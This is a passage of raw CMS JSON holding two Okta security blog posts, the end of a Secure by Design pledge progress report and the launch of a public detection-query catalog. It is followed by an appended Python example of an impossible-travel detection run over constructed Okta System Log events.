vulnerabilities, and allows for public disclosure of vulnerabilities in line with coordinated vulnerability disclosure best practices and international standards. 
\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has, as pledged, maintained 100% coverage of all Okta GA products in Bug Bounty programs and continues to publish a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/vulnerability-reporting-policy/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"vulnerability reporting policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/sites/default/files/2024-08/Okta_Vulnerability_Disclosure_Policy_v2.0.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disclosure policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From May 2024 to May 2025, Okta triaged 153 valid issues submitted via bug bounty programs and paid out $405,801 in total rewards.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta ran several “bounty reward multiplier” campaigns in which vulnerability researchers were paid double, and in some cases triple the financial reward for finding vulnerabilities in specific products. This attracted a number of new security researchers to our bug bounty program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. 
Provide transparency on vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate transparency in vulnerability reporting by including accurate Common Weakness Enumeration (CWE) and Common Platform Enumeration (CPE) fields in every Common Vulnerabilities and Exposures (CVE) record for the manufacturer’s products. Additionally, issue CVEs in a timely manner for, at minimum, all critical or high-impact vulnerabilities that either require actions by a customer to patch or have evidence of active exploitation.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has formalized our approach to sharing vulnerability information with customers during the term of the pledge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We continue to remediate vulnerabilities discovered in Okta products in accordance with the contractual terms entered into with customers. Okta publishes CVEs when a vulnerability discovered in an Okta component requires action on the part of an Okta customer. Okta is a CVE Numbering Authority (CNA) authorized by CISA and MITRE to publish vulnerability information as CVE (Common Vulnerabilities and Exposures) bulletins. 
CVE bulletins for customer-installed Okta clients and agents are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://trust.asqula.com/security-advisories/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published online\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has also revised its process for notifying customers of vulnerability information for a broader set of vulnerability types. All reported vulnerabilities are subject to both a technical assessment and an assessment of potential customer impact.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Deliver improved logging and monitoring for customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Okta products provide mechanisms for administrators to troubleshoot access issues and for security teams to monitor for suspicious activity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At minimum, logged events include authentication and application access events, administrator and user actions, session context, and information on the source and target of an action. 
We recommend reading the table provided in our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/cisasecurebydesign1/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"half-yearly update\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to learn more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta made measurable improvements to logging of both the Okta and Auth0 platforms, which are detailed below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Improvements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.asqula.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"event library\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" now includes over 1000 unique events\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security 
personnel can generate queries for new events related to Okta Desktop MFA, Okta Privileged Access, Okta Identity Governance, Identity Verification, Enhanced Disaster Recovery, Device Assurance, Identity Threat Protection, Workflows and Universal Directory.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/rootsessionidroottokenid/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Root session and token context\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" included as a property in all relevant System Log events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel can easily group all interactive user events to a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"rootSessionId\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" property and all calls made using a given API token to a rootApiTokenId property\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.asqula.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configuration changes\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" included as a property in the target object of all relevant System Log 
events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel can use the changeDetails property to quickly identify in System Log the prior and current state when administrators modify critical policy settings (IdP, directory agent, password policies, authentication policies, etc.). \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/content/topics/reports/mfa-abandonment.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA abandonment \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"events added to System Log\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel are better able to troubleshoot technical issues or MFA fatigue attacks.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 System Log 
Improvements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admins can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/security-alerts\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"create and modify thresholds\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for notifications in Auth0 Security Center\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can set thresholds for suspicious activity above which alerts can be configured, ensuring a prompt response to genuine incidents and fewer false alarms.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/changelog#1Yusq2sGxZU8e0ek2VQKfK\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 Dashboard Session 
Management\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can manually revoke a user’s sessions from the management console.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/prioritized-log-streams\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prioritized Log Streams\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can prioritize delivery of security-relevant events in their log streams ahead of other events, so security signals reach the SIEM first when a stream is under load.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Final word\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From the moment we signed the CISA Secure by Design pledge, Okta’s Product, Engineering and Security teams were enthusiastic about tackling this important work. The pledge was highly aligned with one of Okta’s four core values (“Always Secure, Always On.”). 
And every Okta employee is incentivized to lean into our security program under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/au/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - our long-term initiative to lead the industry in the fight against Identity-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One key benefit of CISA’s approach was in asking signatories to demonstrate progress. This meant that even in areas where our controls were mature, we could still challenge the business to demonstrate further improvements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the more challenging conversations was around our “definition of done” for some of these programs. We observed that the quantum of effort required to close out the final 5-10% of coverage for any given control almost always required more resources than the first 90-95%. The support required to manage exception processes and the engineering required to handle edge use cases was the most taxing on our teams. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the ambitious milestones we put forward, I’m very proud of all the people at Okta who collaborated, made concessions, and, in many cases, innovated to help meet our Secure by Design pledge goals.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As mentioned at the halfway point in this exercise, Secure by Design is never “done.” Okta is passionate about security - especially the security features all cloud applications need to support - to meet our larger, more ambitious goal of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/blog/2024/10/oktas-mission-to-standardize-identity-security/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"eliminating identity-based attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
\",\"marks\":[],\"data\":{}}]}]}"}},{"updatedAt":"2025-05-22T00:26:15.598Z","slug":"/articles/2025/05/leveraging-okta-syslogs-for-proactive-threat-detection","node_locale":"en","date":"2025-05-20T00:00","secAuthor":[{"name":"Ryan Mombourquette","slug":"/hackers/ryan-mombourquette","jobTitle":"Detection and Response Engineer","id":"e683d13a-ed28-56b7-9833-acd324958d57","bio":{"bio":"<p> </p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=15&h=18&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=29&h=36&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=58&h=71&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=116&h=142&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=58&h=71&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=15&h=18&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=29&h=36&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=58&h=71&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=116&h=142&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 
100vw"}},"layout":"constrained","backgroundColor":"#c8c8c8","width":58,"height":71}}}],"title":"Leveraging Okta System Logs for Proactive Threat Detection","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"Introducing the Okta Security Detection Catalog, a repository of detection queries designed to help Okta customers."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is thrilled to announce the launch of our Customer Detection Catalog, a repository of detection queries designed to help Okta customers proactively identify and respond to potential security threats.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This publicly accessible GitHub repository, found at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://github.com/okta/customer-detections\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", offers a growing collection of pre-built queries, contributed by Okta personnel and the wider security community, that surface suspicious activities ranging from anomalous user behavior and potential account takeovers to misconfigurations and emerging attack patterns. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many of these detections were built while analyzing real cyber threats against Okta tenants. The detections also contain preventative configurations Okta administrators can implement to proactively mitigate the threat that’s being detected. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When paired with the broader \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.asqula.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta event library\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (numbering over 1000 events), the Okta Customer Detection Catalog is a versatile resource designed to provide SOC analysts with readily usable queries to integrate into their monitoring and alerting workflows, enabling faster identification of potential incidents. It also offers threat hunters a foundation for building and customizing more sophisticated detection rules tailored to their specific environment and risk appetite. Detailed descriptions of security-relevant log fields are also available to help security analysts interpret logs during an investigation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here are a few example detections that highlight the potential of the catalog:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Impossible Travel with New Device\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": This detection looks for authentication events originating from geographically distant locations within a short timeframe, coupled with the use of a previously unseen device for the user. 
This can be a strong indicator of account takeover.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Okta Administrator Activity: \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Unusual activity conducted by an administrator such as deactivating all other super administrators to prevent response, disabling log streams to prevent detection, or downgrading MFA on authentication policies. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Access from Tor Exit Nodes\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Identifying access attempts to sensitive applications originating from Tor exit nodes can flag potentially anonymized and suspicious activity.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection Queries vs. Hunting Queries\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The repository makes a distinction between detection queries and hunting queries, both of which reside in different folders within the catalog:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection queries are designed for continuous monitoring and alerting. They are typically more specific and aim to identify high-confidence indicators of malicious activity or policy violations. 
When a detection query triggers, it ideally generates an alert for immediate investigation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Hunting queries are more exploratory and are used for proactive investigations. They might look for broader patterns or anomalies that don't necessarily trigger immediate alerts but warrant further analysis by a threat hunter. Hunting queries can help uncover stealthy or sophisticated attacks that might evade standard detections.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers should baseline these detections against their environment and filter out business-approved processes that may cause false positives. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Your Contribution Matters\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we believe that by sharing knowledge and expertise, our whole community can become more resilient against evolving threats. The community-driven nature of the catalog allows for the rapid dissemination of detection strategies for newly identified vulnerabilities and attack techniques.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We actively encourage customers to contribute their own detection ideas to this growing repository. If you see a gap in our current coverage, or find any issues, open a GitHub issue to have it addressed. 
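The "Impossible Travel with New Device" detection listed above, and the rootSessionId grouping described in the Secure by Design post's System Log table, are easier to reason about with the logic written out against real-looking events. The block below is an added example; it is not code from this post or from the okta/customer-detections repository. The field names it reads (eventType, published, outcome.result, actor.id, actor.alternateId, client.geographicalContext.geolocation, client.userAgent.rawUserAgent, authenticationContext.rootSessionId) follow the Okta System Log schema; the sample events, the 900 km/h speed threshold, the per-user device baseline, and the use of the raw user agent as the device identity are assumptions made for the example.

```python
"""Impossible travel with a new device, run over constructed Okta System Log events.

Added example, not the Okta post's or the okta/customer-detections repo's code.
Schema field names follow the Okta System Log; sample events, threshold, baseline
and the user-agent-as-device choice are assumptions for illustration only.
"""
import math
from collections import defaultdict
from datetime import datetime

MAC_CHROME = "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) Chrome/124.0"  # assumed known device
SCRIPT_UA = "python-requests/2.31.0"                                       # assumed unseen device


def _event(actor_id, email, published, city, lat, lon, user_agent, root_session,
           event_type="user.session.start"):
    """Build a trimmed System Log event (constructed data, not from any real tenant)."""
    return {
        "eventType": event_type,
        "published": published,
        "outcome": {"result": "SUCCESS"},
        "actor": {"id": actor_id, "alternateId": email, "type": "User"},
        "client": {
            "userAgent": {"rawUserAgent": user_agent},
            "geographicalContext": {"city": city, "geolocation": {"lat": lat, "lon": lon}},
        },
        "authenticationContext": {"rootSessionId": root_session},
    }


# Constructed sample: alice is the true positive; bob travels at a plausible speed;
# carol "travels" impossibly but from a device already in her baseline (e.g. VPN egress).
SAMPLE_EVENTS = [
    _event("00u1", "alice@example.com", "2025-05-20T09:00:00.000Z", "London", 51.5074, -0.1278, MAC_CHROME, "s1"),
    _event("00u1", "alice@example.com", "2025-05-20T09:05:00.000Z", "London", 51.5074, -0.1278, MAC_CHROME, "s1",
           event_type="user.authentication.sso"),
    _event("00u1", "alice@example.com", "2025-05-20T09:40:00.000Z", "Singapore", 1.3521, 103.8198, SCRIPT_UA, "s2"),
    _event("00u2", "bob@example.com", "2025-05-20T09:00:00.000Z", "New York", 40.7128, -74.0060, MAC_CHROME, "s3"),
    _event("00u2", "bob@example.com", "2025-05-20T12:00:00.000Z", "Boston", 42.3601, -71.0589, MAC_CHROME, "s4"),
    _event("00u3", "carol@example.com", "2025-05-20T09:00:00.000Z", "London", 51.5074, -0.1278, MAC_CHROME, "s5"),
    _event("00u3", "carol@example.com", "2025-05-20T09:40:00.000Z", "Singapore", 1.3521, 103.8198, MAC_CHROME, "s6"),
]

# Per-user device baseline: the "filter out business-approved processes" step (assumed data).
KNOWN_DEVICES = {"00u1": {MAC_CHROME}, "00u2": {MAC_CHROME}, "00u3": {MAC_CHROME}}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def _ts(event):
    return datetime.fromisoformat(event["published"].replace("Z", "+00:00"))


def _latlon(event):
    g = event["client"]["geographicalContext"]["geolocation"]
    return g["lat"], g["lon"]


def _device(event):
    # Assumption: the raw user agent stands in for device identity. In a real tenant
    # prefer a managed-device or device-fingerprint signal, which is far harder to spoof.
    return event["client"]["userAgent"]["rawUserAgent"]


def impossible_travel_new_device(events, known_devices, max_speed_kmh=900.0):
    """Alert on consecutive successful logins by one actor whose implied ground speed
    exceeds max_speed_kmh AND whose device is absent from that actor's baseline.
    The device condition is what keeps VPN egress changes out of the alert queue."""
    logins = sorted(
        (e for e in events
         if e["eventType"] == "user.session.start" and e["outcome"]["result"] == "SUCCESS"),
        key=_ts,
    )
    by_actor = defaultdict(list)
    for e in logins:
        by_actor[e["actor"]["id"]].append(e)

    alerts = []
    for actor_id, evs in by_actor.items():
        for prev, cur in zip(evs, evs[1:]):
            dist_km = haversine_km(*_latlon(prev), *_latlon(cur))
            hours = (_ts(cur) - _ts(prev)).total_seconds() / 3600.0
            if hours > 0:
                speed = dist_km / hours
            else:
                speed = math.inf if dist_km > 0 else 0.0  # same instant, different place
            if speed > max_speed_kmh and _device(cur) not in known_devices.get(actor_id, set()):
                alerts.append({
                    "actor": cur["actor"]["alternateId"],
                    "from": prev["client"]["geographicalContext"]["city"],
                    "to": cur["client"]["geographicalContext"]["city"],
                    "minutes": round(hours * 60),
                    "speed_kmh": round(speed),
                    "device": _device(cur),
                    "rootSessionId": cur["authenticationContext"]["rootSessionId"],
                })
    return alerts


def group_by_root_session(events):
    """Group event types by rootSessionId so every interactive event from one login
    session can be pulled together during triage of an alert."""
    groups = defaultdict(list)
    for e in events:
        rs = e.get("authenticationContext", {}).get("rootSessionId")
        if rs:
            groups[rs].append(e["eventType"])
    return dict(groups)
```

Running `impossible_travel_new_device(SAMPLE_EVENTS, KNOWN_DEVICES)` yields a single alert for alice (London to Singapore in 40 minutes from an unseen user agent); carol's equally impossible hop is suppressed because her device is in the baseline, and passing an empty baseline makes her fire too. The alert carries the rootSessionId of the suspicious login so the analyst can pivot with `group_by_root_session` to everything that session did.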
